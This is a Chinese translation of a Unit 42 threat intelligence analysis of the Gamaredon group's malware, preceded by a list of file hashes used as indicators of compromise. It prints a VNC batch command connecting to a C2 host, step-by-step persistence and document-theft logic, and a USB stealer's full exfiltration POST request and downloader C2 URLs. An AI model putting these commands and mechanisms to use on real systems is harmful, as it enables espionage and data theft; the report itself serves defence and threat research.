026be8a873560f1496c6961f6e36c312bdda01beacb17c4b744f35ee1923d061 03c943f5cba11b09b9c3afa0705d4a027e5a9d81b299711740cc5aedfe4b4aa1 03e5e99cc8280de4663c4b65bfd26782d4975258808a63a4b20bc068008df7f5 059e40ba91b2b2d827c200476fcbd0fad0d43ab198d0c206c996777d27e6de65 0669e61e51cf43daa431d52b5461c90bdce1b1bee03b087e4406c30264dcb9a4 068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa 0b4a90b823a581311c4acb59f35e32f81f70ca16a2538f54f4dbe03db93350df 0b5316d723d1ebbec9aba0c9ff6761050305d644c3eeb5291b4e2c4de9e5fa15 0b8d59312699739b6e6cb7aeb0f22a2eaebbb0fd898a97ef9b83e8d8e9ce67a0 0dd13d2d0edbcf9d1825c2bfc165876ada2e4d04e2981a0003cb6503fad2287b 0ddb7867e31f3f30cd1cfe74393f8ac5bbdc61538278de9219a49345f0d3af7f 13fed3accac4f38f28e606b110a3b7924d9c7a1a911f8c0613d0bb791e715267 151cf4c83722ba171ae42640e5e13af67ca06ee0a06a74afa53931acf6ac1506 17006d77cc1459aa3d70e4e9377edb2547a7446647aa9872c9dd9ad860ed7e39 1ec7e595677038145991c6d84dc7808602142f258c1f90e9486cca0fe531d74f 208dc592111a8221a9c633efc120b890585f9a67ed340cbb5ec9db4cd5e164e4 2124adbee89f2c1cb65896bed26e7ffa8bf0fcbdfeb99a9e751fea9cca7a896b 22e97292671ada8deef4329eb115c52f6f1bc598bcf01a3961f1c35a2230a013 259a78122ef51ae503059143bf36941fc6090be83213d196ba3051ba36a0b2a1 26564c23530dd14e0042e074f4178a5b2ad6fc8f51f10138fc39941a6303bff9 29453fa1772b6d7d33842d6abbe0cb55c4a4b66a00f43284c8724d7c16749a7d 2a072d9ce63a94d2530cf9f18a232c6a09f6c7bdff9dbe27faceef53604145ea 2c02d3d3fadd76f9d21f5c093459ddc0045c94f17679269eb7a2990a1a88cb42 2d55000bb5cb9e3e1f137810c2e1eb899f68c40e4a6f6307f226c7b8af208abd 2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20 2e89436b355550ceb361fac1b03b78b71eda11d25f26223ac5c8c34ed8972a05 32b0e6394b110860371da5541946a6dcc85358a3951eddc86fdaf5794527c150 33934fcfae5760316b3f40e013cbb03d8086f8c30f9a4ba9bed3f9486a530796 34d86602882e86f8aaaeb7513126c8579a4489f2be31c279188e2f2ca8a0e141 390162dae62a0347e35cf5dad093cfc2f7d4ded62fba9d2df7af6133feb41ee0 3ef8602579c6b145fbaafc8970b4c9a6e7bebd11eb5e37eecaa67b4572c6038b 420acd7e8598fe994b59bf5d30f89e1c11b36cbef464a4786694cf9eada8dd4c 42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988 42eed03907c9dfa0e566fbe5968cdb5a1b7b5e18521f7327185ed2208c6c29b4 46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d 47d929c69bfd8d8efb9c280eabec2f73d4bddf1c3c30120c3fb6334623469888 505ef8cbc1271ce32f0c473468d75a1aba5073c37b2e6b49293ddc9efcb4ac96 5230453eeb98c5a183129ed8b918b429e96020887302ba30941c408108a1ab84 5363220b532d7da378b338e839a501ae5c006cc03c8b2d3627c480d64deb1221 558f33d478091993e5b5921604f8c3873efc87f551fddf61612b5c64d5b610f6 55c76f4f93f9e155fbb6a28447f97c1ccda0081061dc3cb9973d42c1686964b7 56c8246819f7de5cba91001793831441d4ce998ccb8237cb96c9f52e88ea384b 59bddb5ccdc1c37c838c8a3d96a865a28c75b5807415fd931eaff0af931d1820 5ac627f8964d3b9cad69f21e3b8f27305f1f68f49e4f4fae2c73949a04b32692 5ccc76ae1cdf668ba7f89c6cbd0bad44f148cbee736320ead237262ba170ffba 5cd4401c1dae9b9ecd75c96ab29dc64ce40bef3acc6faf7c001ff98ebd3b3413 5cd72eaf555813f1ee187def594584f5cfc6a5e83086f35e281327b5210adffb 5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e 6c258151c593268c13c252d8f275192a6f7a74d5de5754f2cf20fb94be7ee6ea 0458e168baa4fa5942892065925ac82b12245551b539d54c2884b3a21c2699d8 877f1de209eb9d8b2a20a76f8773d12e5a1fcde4148868c7b73added392f62f6 29c728a169c5d18298e77db161dd5d2f6396ceca9ee7849b63ff8a8bc11f911e 98e092b7bfc3bbdaeb82e05de14ba5835c6ac626c17de9eef2049796a031dd10 27e08fb90ada2fd8ce6b6149786edd3b814dd0324257ebd919ed66ada0334b21 9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca f47115ea58615781e56dcac673c19edf7ce00defd7ada709ae97b0708d3eac1e b80719854f8744ba62e9f0e774c09e2e2ed79dd37f9f94ba3ed05ec8507d55e6 467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49 5c47d18b3f0e0274c6a66b2eab27d47c73a0105c263d41c6473aba9a28d0a4ba 01c5729ac1ae3928053c085fd616323a3715863ab3d7e9b8106c09e24df34183 5b6a691cf8faf238b27861941a1b667d889889cc9711a3e561403d6a6ed292c9 e2688f72cc7ae836be19e765e39318873554ee194a09945eb3f3805d04f256ca 9f0228e3d1577ffb2533584c2b1d87ebee0c0d490f981e61d18bb27ab02e52cb 2617f9301869304b88d8a3a4f7b2eab6b0edf264cc1a28b99f5685959242ec39 f3107a5a00f36e12be7cc2e37c35903ef855b8043492af374ea918385821443c 63fcfab8e9b97d9aec3d6f243003ea3e2bf955523f08e6f1c0d1e28c839ee3d5 05cbe01b1125897e0e982c587a10a72f4df795b844a4a2c4cec44aee7f30ce94 5a7da102c11960b9651650143a4a08ae4ce97d68dff999961f1ffc792531afeb df6112e6bad4125b80b8829c13a2ca523bb82cf303cf531389d8795e7512c7e6 cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31 e79dbcc8b60da280e53d9cf818eee1de34251e0551b9947bb2b79a31b131417e a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6 3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6 f77d7940c51c2a1eab849dbd77e59c683ebf7820799ef349e7da2583e1aa11ae 2c5d55619d2f56dc5824a4845334e7804d6d306daac1c23bec6f078f30f1c825 7231177a115656041ba4e5b3cf0bf7a547b074f03592351484267e25cda7c899 d5405f99cec0166857274b6c02a7ef52b36274fedb805a17d2089fd24ed133cf 81921b6a7eba39a3f73895a57892ed3a46ab6365ac97d550ca3b9bff46c7a1c2 1eef9f8d7d3099b87be7ac25121f9d2ccacfb5ccf02b508fb2036b6e059c525f 5255061c3600df1a94b376fca40f3ccb69d1cb6dd42aa744b20a643c7292d20c b5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13 5fb7f6f953be3b65d88bd86d1391ebc9f88fc10b0ef23541463ebf5b157f695c 6016cf9898d74e2e9030be7c987964d817ba28ad2253d1da54c81a1bf49db836 621e55421dffae981e3e933c65626314d5610c7c08f76f83a3d07f0ec6c36e2d 6ccc24971073d24d90c4cbaf83dfbae2969cbf527e319c7ee9a4babcbe88e456 6f8da9180eebe02ba35317cb8aee5c8df6ac29795af70eb9430c3588d457aad6 71c5b899a5187baeb8f605ca39ca56bf05a63025a8f9f84c45590d8345e5d349 725b7d92ed66be160f2e04395008a65c72814d5ddf842d9778396f6c6679d85e 72d4b780a90ede7ea152f5da0973965cab31d2813fa8c2fe0e1cb611f5ca257e 73670d06851f588c7df44dc478f49883406697c48c618438e0f249b7a916552e 74e017853fbc85ee77ca7476cd25423815602aaaa02b29e0003c95c9551b8890 75d2367dc79d9f8aed165729df90ed5d28fefe267778dbe4d3d74aafa75d66e0 7a5a1c6ea0c2f017df9f06975c93a356cac20b19031fcde96136fa5881e5ef3a 7adb049e0b49312aea904c70e16d0e7f03d01aae4bf8ac867e8219ced4e6e057 7bfa85bec239b6c4419b2d57149c5960263c80e493f888d03ceaaa3f945b1b25 7f324b658f587b3b27921ebeba5ac25aebd669b33e6801fa9581de8c2eb0df2e 7fee970748eb83045e36911dafdaee0d4069ebe72c059cc7de3d65539012c2e9 823793a37d748ffe708864c16c853c67a5db812712481da1d24790b455163940 8512aabfa0175684bdbb77481d6b272b63dbc4249b04a44e1003b7d8fdea0a89 86c81f03cf7d8f8af38c2559dbf506cccdc25579f3b29fb574f823a67f99a0a3 88ae7e60b9dd57fc6b2d667ce33fb29c0f75d37eb7c837ccf56cb7994386d5ef 8b50e3ca06a22d0be6a71232b320137c776f80ac3f2c81b7440b43854b8a3bf0 8bd40e7fe6bbd4d5810db2c142186bb58da445a132fb6f9ff01c46947a532244 8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845 8d38726d674279705fe06b4b45bbbaef10756c547d560cea6998e23dba09f80c 8db47439685edc683765abb5e6d7d0d05479bf9ee164992db9e8ce97fe43ee2f 95de2e16f1b05d1b45b1d182c1503568c2e5fd4a81ac52fe1bc9e881d1a272b1 95e3204228341852b7c97f357f799e7ec9688abe1262436b569e56397f1fd864 98caf00760d772598386eb8d4f26caf92fb891915ac08da6bf830be5e45278d3 99c9440a84cdc428ce140de901452eb334faec49f1f6258acdde1ddcbb34376e 9a8776e4ae38cf529bab28947b31ade84301262b7996dc37ec47afa4fb4cf6e1 9beb1d2a03ff2d4c15913de0f87b72074155b44df791bd967dac8155e97a0e06 9c8d518fbbc8cbb25fa309f5396efa5749e57a3b0158779404c8d3e92baf6596 a064a28e5e7409a96bba93fc57f44cadc3492bb0f49792c89c973e30b0f5d498 a194b47043356fa365d98a5f7c582b6f87fac90acf0f469ed3651cfe2fd7b2c9 a21dfb8e8b7c8dfbeeb4d72e6ef1f22c667b8968b3a3b1dcce99f44faab05903 a2e0fe2d385dabcdfb024100216d259ddd1fa9907e982d297846fd29b8d4d415 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599 a595da9a2fa58d4f8be0bfbcf7f4c950435ff5289dd1ccf2c65eec73a0afe97f a972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b aa860d405746401ae4155485326fdeb39718832c77c73540d48f4fbb8e596215 ab6832a4432b4bdaec0706f7b00a369c48175eac9abc3e537032b1f5d26a993b ada2f0703614b3447d427827777af5d4ee9ffe9179498970326926751a4f8d65 b16d317c11228bd3573126a0e1bc0bbf35d84a4a1f47dfb06b70634a21fd9823 b3665548cc0f2fce3593fb7139f49588faa1d327b6d23feb564ca4194053ae8a b5578c48a11533871ae91e6d5632aafc25d3976c0626d62abab306663566d024 b67a6f87fc3fd7c5c3666acac5918c8c08a53ab6a966f4d1daf38105a566ede1 b6abc8ab631dcf52e028ab26dbe3bb94022d69193c0acc8642cbd6329cbb23ef b7e117eb342b0d450095805073326989c792bf5ccbbdcd5f4a9ace50e517412e bb14abc9b0798c7756a6ed887308a3e6210cc08a5149dc1360fdd1f5bca27cca bdadb319f071f02462d107380102b669e407bb2a0b20e77a9a8a5726b4cbbc4b bf2383cfbee4cbb0bda2614839454ab1724c9bbfff8b4b48e0f48579ae220c10 bf52b44168de1855d83186163a2d5f29e488ddafdfd5447e211aec4a769cf74a c0d5cf7a0035deda5646aaf520b3ff632aa6be76ddbc88f38ddc11e77ffb40b4 c1a82a788df7418712664138c0fdb05232036a27ab0998479d60c656998849f1 c63a523834ab59ab5621a0acb156a9b901befe806044642fe5fec8a0ba545e70 d05d3f3582e13eaf5f39d7143ca1a4b1367cc5267bf9958a15e27cf53e059518 d0e456cff03c2483ded9a0f8c1b99f9fefb6ba47dcaf949dae27abe940ee20e6 d8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385 dada74663e3e29ee26bfd03a888f0bda9fc81e148511fa98f73f8e8a915933cc db3ffcbf136e0268ec66f28b30fa8ba350f74e02e8e737e61cc6ef8d8258027e dd26b85b6568595b1d2bbc47ce47d071ede75665fbd779d637b74663ead5539e df9038660164623a827a8119d4cb3d71d0a5288b12bdfdd32c72769bf90a9ea0 dfed16e9184a86e6fcd17a98f127410840d058db667e9975b43add100c33122e e0063d2524a89159cf5da12661225fbb27725bbd72acd9497b7207ecf2f3aeb6 e00c55ddda9cbb82fb47924fafdf40c3394dc1127d9901c71a69ef3ef664b817 e14a51d69211948163ab20b0cc68adf410bb821f2890f55d2d202c745f4ec1b8 e2e3f243bbcad666852e64202d35f6dd88c58f5d24435d92975697b0efa8a775 e37e25739e8bc4620d9d37d8f6b400cd82c85b89d206436ba35930ed96db6eb0 e55b5ede808b6d491f18737d6a1cf34b5178f02e9ea01d7cff31a449888dbd73 ed28d9207acac2afff817eaa56d1599422e23946dffa4f8bade376d52a6af7d4 eda0853e814ee31a66c3b42af45cd66019ffd61eac30e97bd34c27d79253a1bb f1b3e58d060803b0ff6008386bab47fb8099ac75ee74f385ac34340a28bf716e f2091f71227180d74ba1ba4607635e623553b1826314dca91cb31839eb00c4ea f214d55ccb5db5edbaafe7d40b240c79f04c70d441adee01ef438f776eb37037 f571ddc894915dee136cf24731ff3d79fe4f811b112d122a34a128628cb43c4a f7676d2a28992a382475af2ae0abca4794e1397ef3327f30f7d4cbdbc2ca0a68 f8e20894c8c18d79e80b431008aa8bef46cc10a355a4934f9cc40ffd637b8890 fa1bf7565352099b74624c8beeff6620411e1efe00e54f8b4190f69e243d5811 fa784f69265ebe5e150cf5956a40d86335d1a5edc57fffcc7ce6eedc591c2751
解密:Gamaredon黑客组织的工具进化与分析
导语:Palo Alto Networks 的威胁情报团队Unit 42最近观察到一个威胁组织正在分发最新定制开发的恶意软件。Unit 42将这个威胁组织定义为Gamaredon组织,研究表明Gamaredon组织自2013年以来就一直很活跃。
Palo Alto Networks 的威胁情报团队Unit 42最近观察到一个威胁组织正在分发最新定制开发的恶意软件。Unit 42将这个威胁组织定义为Gamaredon组织,研究表明Gamaredon组织自2013年以来就一直很活跃。
在过去,Gamaredon组织会大量使用现成的工具,不过最新的研究表明,Gamaredon组织已经转向定制开发的恶意软件,这一转变表明Gamaredon组织技术能力已经大幅提高。自定义开发的恶意软件功能非常全面,包括以下功能:
1.用于下载和执行其选择的附加有效负载的机制 2.能够扫描特定文件类型的系统驱动器 3.捕获屏幕截图的能力 4.在用户的安全上下文中远程执行系统上的命令的能力
Gamaredon组织主要用于向受损域名,动态DNS提供商,俄罗斯和乌克兰的国家和地区顶级域名,俄罗斯托管服务提供商分发其定制的恶意软件。对于Gamaredon组织所开发的恶意软件,目前的各种安全防护软件很难检测到,Unit 42团队认为这可能是由于恶意软件的模块化性质导致的,由Gamaredon开发的恶意软件大量使用批处理脚本,善于利用合法的应用程序和工具(如wget)来进行恶意攻击。
Gamaredon的历史工具分析
Symantec和趋势科技最早发现了Gamaredon组织分发的攻击样本。不幸的是,这仅仅是其有效载荷的第一个变体,稍后的有效载荷变量的一些样本也只是它们定义为TROJ_RESETTER.BB和TROJ_FRAUDROP.EX而已。
最初,由Gamaredon发送到攻击目标的有效负载包括密码保护的自解压缩文件(.SFX),该文件在提取时会将一个批处理脚本写入磁盘并安装一个合法的远程管理工具,这种远程管理工具称为工具远程操作系统(Remote Manipulator System ),接着这个工具就会将被用于恶意目的。
比如一个这样的自解压缩文件(ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc)就是在2014年4月左右首次发现的。用来提取该文件的密码(由许多密码保护的SFX有效载荷会重复使用)是“1234567890__”,另外发现包含于SFX文件中的文件包括名为“123.cmd”的批处理文件和名为“setting.exe”的另一个SFX文件,其中名为“setting.exe”的SFX文件包含一个.MSI安装程序包,该程序包用来安装远程操作系统和处理安装的批处理脚本。
后来发现的一些文件的有效负载会将批处理脚本写入磁盘以及wget工具的二进制文件。批处理脚本将使用wget二进制文件下载和执行其他的可执行文件,批处理脚本还将使用wget向命令和控制(C2)服务器发送POST请求,这些服务器将包含有关受影响系统的信息,然后这些恶意文件在执行时会抛出诱饵文件。
这种类型的有效载荷攻击,可以从下面这三个示例种发现:
a6a44ee854c846f31d15b0ca2d6001fb0bdddc85f17e2e56abb2fa9373e8cfe7 b5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13 3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b
Unit 42在2014年使用wget工具第一次发现了这些样本,当时这三个样本正伪装成乌克兰总统办公室,乌克兰国家安全,乌克兰国防,乌克兰反恐怖主义行动区以及乌克兰爱国主义的名义来抛出诱饵文件。如下图所示就是这样一个诱饵文件,
其他发现的有效载荷将再次使用SFX文件来传递批处理脚本并允许通过VNC协议进行远程访问的可执行文件。这些VNC 可执行文件将包含在SFX文件中或通过批处理脚本下载。Unit 42找到了用来加载VNC可执行文件的一个URL: hxxp://prestigeclub.frantov.com[.]ua/press-center/press/chrome-xvnc-v5517.exe。
然后批处理脚本将尝试让VNC程序连接到命令和控制(C2)服务器,这样该服务器就能够控制受损系统。另外在受损系统上的所有VNC安装都会使用相同的配置文件,RC4加密文件和密码。
2015年1月前后,发现了cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31样本,在这个样本中,使用的批处理脚本就确保了VNC连接可用:
start winlogons -autoreconnect -id:%sP% -connect grom56.ddns.net:5500
VNC配置文件中配置的路径是“Y:\ПРОБА\Созданиетроянов\созданиеRMS \ VNC”,但这不是Cyrillic文件路径的唯一位置。许多批处理脚本还会使用别的硬编码的路径,例如“Главноеменю\Программы\Автозагрузка”。许多有效负载还会包括一个VBS脚本,VBS脚本会向用户显示一个对话框“应用程序无法初始化(0xc0000005),是否尝试再次打开该文件?这就是欺骗用户再次运行恶意软件。
某些SFX文件还包括另一个合法的应用程序ChkFlsh.exe(8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845),经分析,这个应用程序是由乌克兰程序员编写的,用于检查USB闪存驱动器的性能,不过目前还没有搞清楚它对攻击者到底起到了一个什么样的帮助,但一种可能性就是它以某种方式用来窃取或监视USB设备上的文件。在Unit 42的研究中,研究人员发现这个应用程序存在于一些SFX文件,VNC程序以及一些没有包含VNC程序的SFX文件中。
对植入体进行自定义
虽然观察到的最近的样品仍然在使用批处理脚本和SFX文件,但这些数量已经越来越少了,Gamaredon组织已经不再利用像wget,远程控制工具,VNC和ChkFlsh.exe这样的应用程序了,即不再使用wget向攻击者分发自定义开发的下载程序,不再远程操作或利用VNC恶意软件进行远程植入。
在2015年6月,研究人员第一次发现了许多较新的使用自定义下载器的样本,这些样本通常包含在名为“LocalSMS.dll”的SFX植入体中,自定义下载器会向adobe.update-service[.]net(样本中的硬编码)发出请求(详细情况请看附录A)。
在2016年2月,另一个现在经常出现的自定义工具“Pteranodon”被发现包含在SFX植入体中。 “Pteranodon”这个SFX文件(3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9)包含一个新的木马(598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824),研究人员把这个木马称之为“Pteranodon”的一个自定义后门,通过该后门能够执行以下任务:
1.可以每隔一定的时间捕获屏幕截图并将其上传到攻击者的服务器 2.下载和执行其他文件 3.在系统上执行任意攻击命令
“Pteranodon”的最早版本是使用硬编码的URL来进行命令和控制。它使用static multipart boundary发送POST请求到“msrestore[.]ru/post.php”
————870978B0uNd4Ry_$
较新版本的工具还会使用hardcoded domain和multipart boundary,它们也会共享类似的pdb字符串。其他“Pteranodon”样本还可以在autofocus 属性中使用“Pteranodon”标签找到。 Pteranodon的最新变种在附录A中会有分析。
到目前为止,研究人员只确定了一个用于新植入体的传送载体—— JavaScript文件(f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd),该文件于2016年12月第一次从下载的http://samotsvety.com[.]ua/files/index.pht (大概是被有效载荷攻破的网站)中发现的,而此前的SFX文件(b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875)就包含两个Gamaredon组织自定义的工具。
e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4就是其中的一个相关的样品,该样品使用了Mutex 样本所创建的互斥体,并包含一个一套分析工具,该工具的原始名称是“AdapterTroubleshooter.exe”,并使用类似于OpenVPN使用的图标,如下所示。
在AutoFocus属性中检查样本的文件活动时,很明显可以发现,样本是一个自解压的可执行文件。
使用7zip在虚拟机中打开该样本,可以检查所有包含的文件内容。下表详细列举了SFX文件的SHA256值,文件名,编译时间和pdb文件的生成路径。
样本的引导逻辑依赖于“condirs.cmd”的内容。简单来说,“condirs.cmd”中的逻辑如下:
1.确保“%LOCALAPPDATA%\Microsoft\Windows\”存在
2.清除和删除可能干扰样品执行的进程、文件和计划任务
3.将“winrestore.dll”复制到“%LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll”
4.将“OfficeUpdate.dll”复制到“%LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll”
5.确定操作系统是Windows XP还是Windows 7
6.如果系统运行的是Windows XP
a.设置目录以将文件复制为“%WINDIR%\Setup\State\Office” b.将“UsrClass.lnk”复制到“%USERPROFILE%\Главное меню\Программы\Автозагрузка\” C.将“SmartArtGraphicsLog.lnk”复制到“%USERPROFILE%\Главное меню\Программы\Автозагрузка\”
7.如果系统运行的是Windows7
a.设置目录以将文件复制为“%APPDATA%\Microsoft\Office” b.将“UsrClass.lnk”复制到“%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” c.将“SmartArtGraphicsLog.lnk”复制到“%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”
8.将“winrestore.dll”复制到步骤6或7a中设置的目录,文件名为“MSO1234.win”
9.将“LocalSMS.dll”复制到步骤6或7a中设置的目录,文件名为“MSO1567.dls”
10.将“OfficeUpdate.dll”复制到步骤6或7a中设置的目录,文件名为“MSO5678.usb”
11.将“MpClients.dll”复制到步骤6或7a中设置的目录,文件名为“MSO8734.obn”
12.使用rundll32.exe在“MSO1234.win”中执行导出的函数“updater”
13.使用rundll32.exe在“MSO1567.dls”中执行导出的函数“EntryPoint”
应该注意,“UsrClass.lnk”链接到“%WINDIR%\system32\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll,updater”,“SmartArtGraphicsLog.lnk”链接到“C:\WINDOWS\system32\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll,StartBackup ”。这些是“winrestore.dll”和“OfficeUpdate.dll”所在的位置,分别复制到步骤3和4。
然后“condirs.cmd”脚本继续:
1.计划以下任务:
a.任务名称“UpdatesWinRes”,调用“MSO1234.win,updater” b.任务名称“UpdatesWinDLL”,调用“MSO1567.dls,EntryPoint” C.任务名称“UpdatesWinUSBOOK”,调用“MSO5678.usb,StartBackup” d.任务名称“UpdatesWinOBN”,调用“MSO8734.obn,bitDefender”
2.确保目录“%Temp%\ reports \ ProfileSkype \”存在
3.中止 “skype.exe” 进程
4.将“%AppData%\ Skype”的内容复制到“%Temp%\ reports \ ProfileSkype \”
5.在“%Temp%\ reports \%COMPUTERNAME \”下创建名称为Z W P S V Q N M L K I J F H E G和D的子目录。这些是驱动器号。
6.将所有包含扩展名“doc”,“docx”,“xls”,“xlsx”,“rtf”“odt”和“txt”的驱动器号的文件复制到“%TEMP%\ reports \%COMPUTERNAME% %% d \“其中%% d是驱动器盘符
7.将具有上述扩展名的所有文件从所有用户的“桌面”,“文档”和“下载”文件夹复制到“%TEMP%\ reports \%COMPUTERNAME%\ Desktop \”,“%TEMP%\ reports \% COMPUTERNAME%\ Documents \“和”%TEMP%\ reports \%COMPUTERNAME%\ Downloads \“
8.使用rundll32.exe在“MSO5678.usb”中执行导出的函数“StartBackup”
9.使用rundll32.exe在“MSO8734.obn”中执行导出的函数“bitDefender”
10.清理临时文件,并将进行自我删除和休眠
当这个脚本完成后,攻击者就会利用这些植入体来窃取文件,捕获截图同时赋予这些植入体逃避检测的能力。这些植入体会在附录A中详细分析。
植入体的变体过程
虽然用于控制受损系统的有效载荷在不断地变异,但是在所发现的样本中,它们都出现了许多共性。虽然并不是每个样本都并不像以上所描述的那样,但已知样本的散列都包含在附录中的“攻击指示器(indicators of compromise)”部分。下面是来自几个相关样本的一些有趣的行为:
1.许多批处理脚本都出现了一些常用英文的拼写错误。比如文件名“cmd”,另一个例子是,“domen”被用作批处理脚本中的变量名,但经过分析“domen”其实就是 “domain”。
2.几乎所有样本中的所有批处理脚本都用ping localhost作为睡眠方式
3.许多批处理脚本命名为“cmd”,其中一些包括字符串“Trons_ups”和“Treams”
4.许多批处理脚本都使用相同的命令来确定操作系统的版本
5.许多早期的样本都会使用如wget,UltraVNC和ChkFlash这样的应用程序,不过这些程序已早被最新样本中的自定义工具给替换了
6.采用VNC的样本都会使用相同的配置和密码
Monikers利用文件名,在脚本中导出和文件主题一致的的DLL函数,域和变量名,然后通过HTML 中autofocus属性中的SFX植入体,来识别类似的植入体。大多数样本以类似的方式传送,即被SFX植入体攻击过的资源,这些资源被分段并被加载批处理和VBS脚本。这些样本,在IPv4地址之间重复使用SSL证书以及在域名之间重复使用IPv4地址是显而易见的,如下图所示。
下图就是一个最新的样本(在附录A中会详细分析),文件名以及SFX文件的重复使用非常显而易见。
最新样本的发现
在VirusTotal(一个提供免费的可疑文件分析服务的网站)上所发现的植入体都是非常有限的,并且经常出现相互冲突的检测。从2014年以来,使用这些植入体的威胁组织就一直在活跃着,并且并且把攻击目标直指乌克兰政府。其中一些样本会同时共享传送机制和基础设施,这些样本后来被一些网络安全公司发现,并被认为是Gamaredon组织研发的。但是,目前最新的变体提供了更高级的恶意软件,不过还没有对其进行未命名。
Unit 42的研究人员会定期使用AutoFocus属性来搜索WildFire(执行动态分析以识别和阻止未知威胁)的各项安全检测报告,以期发现识别未识别出的最新样本及它们的攻击行为和活动。
Palo Alto Networks客户可以通过以下方式得知这些威胁:
1.WildFire已将此报告中描述的恶意软件标识为恶意软件
2. Traps检测( Palo Alto Networks 下一代安全平台的组成部份)会防止系统执行此报告中描述的恶意软件
3.这些样本所使用的C2域目前已被被阻止。
附录A:自定义植入体分析
USBStealer:MSO5678.usb / OfficeUpdate.dll
这个文件是一个USB文件窃取程序,也可以通过其内部名称“USBgrabber.dll”猜出。然而,却是很容易实现的,这使它成为系统上任何新连接的逻辑卷(Logical Volume)的文件窃取器。因为恶意软件会监视计算机的消息WM_COMMAND和WM_DEVICECHANGE,但不验证是否连接了USB驱动器。
恶意软件创建两个互斥体“__Wsnusb73__”和“__Wsnusbtt73__”。然后,利用它们在本地用户的临时路径中创建以下文件夹:
“C:\Users\<Username>\AppData\Local\Temp\reports”
把这个文件夹当作临时位置,将来新连接的逻辑驱动器的所有文件都会复制到C2服务器,并将其上传到C2服务器。文件通过HTTP POST方法逐个传送到硬编码的C2服务器“195.62.52.93”。使用以下请求,其中还包括被攻击者、要传输的文件以及源驱动器的信息:
POST /post.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----qwerty Host: 195.62.52.93 Content-Length: ... Cache-Control: no-cache ------qwerty Content-Disposition: form-data; name="filename" \\<filename> ------qwerty Content-Disposition: form-data; name="filedate" <month>/<day>/<year> <hour>:<seconds> ------qwerty Content-Disposition: form-data; name="compname" <ComputerName>||<Username>||<UserHWGUID>||<C_VolumeSerialNumber> ------qwerty Content-Disposition: form-data; name="serial" <SerialNumberOfDriveToStealFrom> ------qwerty Content-Disposition: form-data; name="w" "?" ------qwerty Content-Disposition: form-data; name="filesize" <FileSize> ------qwerty Content-Disposition: form-data; name="file"; filename="<AbsoluteFilePathInTemporaryLocation>" Content-Type: application/octet-stream Content-Transfer-Encoding: binary ...File data... ------qwerty--
这个恶意软件还会在本地用户temp文件夹中创建一个名为“asha.dat”的SQLite数据库。其中,它通过计算文件名的MD5哈希值和文件长度来跟踪被盗的文件。因此,它会从驱动器创建原始文件路径的Unicode字符串。最后,它使用API函数MD5Init(),MD5Update()和MD5Final()来计算散列并将其存储在数据库中。
应该注意,必须把文件的哈希值添加到没有以下扩展名的数据库中:
DLL BIN CAB EXE ISO
下载:MSO1567.dls / LocalSMS.dll
这个文件本质上是一个简单的下载器,它会连接到C2服务器发送一些用户数据,在得到一个可执行的响应后开始执行。该DLL用C++编写,包含的所有功能都在一个名为“EntryPoint”的导出函数中。“EntryPoint”没有任何编译器或链接器进行优化编译过,因此就一直保持着其文件大小和PDB路径。
首先,恶意软件会检索本地用户的临时路径“C:\Users\<Username>\AppData\Local\Temp\”;计算机名称,例如“WIN-MLABCSUOVJB”;硬件配置文件GUID例如“{826ee360-7139-11de-8d20-808e6f6e6263}”和C:\ drive的逻辑卷序列号,例如“1956047236”。接下来,它便会采用以下硬编码字符串:
http://adobe.update-service[.]net/index.php?comp=
要创建带有受害者信息的URL字符串以联系C2服务器:
http://adobe.update-service[.]net/index.php?comp=WIN-MLABCSUOVJB&id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236
要创建保存下载文件的文件名,恶意软件会尝试构建一个10个字符的随机字符串。然而,由于实现错误,字符串总是会以相同的方式结束,即“frAQBc8Wsa”。此字符串会与检索到的本地用户的临时路径同时连接到以下文件路径:
C:\Users\<Username>\AppData\Local\Temp\frAQBc8Wsa
